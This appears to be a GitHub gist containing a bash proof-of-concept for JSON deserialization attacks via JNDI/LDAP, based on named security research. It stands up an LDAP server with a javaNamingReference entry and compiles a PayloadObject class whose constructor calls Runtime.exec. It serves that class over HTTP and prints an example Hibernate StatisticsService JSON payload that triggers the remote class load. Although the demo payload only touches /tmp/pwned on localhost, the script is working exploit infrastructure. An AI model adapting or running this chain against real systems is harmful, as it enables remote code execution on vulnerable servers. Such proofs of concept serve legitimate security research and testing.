Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Backend script based on @pwntester JSON deserialization research
#!/bin/bash
echo "Starting Apache DS using docker @ ldap://localhost:10389"
docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds
echo "... waiting 20 seconds to start Apache DS"
sleep 20
# password: secret, if used with LDAP login
(cat <<"EOF"
dn: cn=deser,dc=example,dc=com
objectClass: top
objectClass: person
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: simpleSecurityObject
objectClass: javaNamingReference
javaCodebase: http://localhost:8000/
javaFactory: PayloadObject
javaClassName: PayloadObject
cn: deser
sn: deser
givenName: deser
mail: deser@example.com
userPassword: {SHA384}WKd1ukESvjAFrkQHznV9iP2nHUBJe7gCbsrFTU4//HIyzo3jq1rLMK45dg/ufFPt
EOF
) | docker exec -i json-deser-ldap ldapadd -x -H ldap://localhost:10389 -D "uid=admin,ou=system" -w secret
echo "Created cn=deser,dc=example,dc=com entry in LDAP"
(cat <<"EOF"
public class PayloadObject {
public PayloadObject() {
try {
System.out.println("\n\n\n\n\n\n\n\n@@@@@@@@@@@@@@\npwned\n@@@@@@@@@@@@@@\n\n\n\n\n\n\n\n\n\n");
Runtime.getRuntime().exec("touch /tmp/pwned");
} catch (Exception e) {
e.printStackTrace();
}
}
}
EOF
) > PayloadObject.java; javac PayloadObject.java; rm PayloadObject.java
echo "Created PayloadObject.class"
echo "Starting SimpleHTTPServer @ localhost:8000, press CTRL+C to interrupt"
echo 'Example JSON PAYLOAD: {"org.hibernate.jmx.StatisticsService","sessionFactoryJNDIName":"ldap://localhost:10389/cn=deser,dc=example,dc=com"}'
python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"
echo "Stopping LDAP"
docker stop json-deser-ldap
echo "Removing LDAP docker instance"
docker rm json-deser-ldap
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment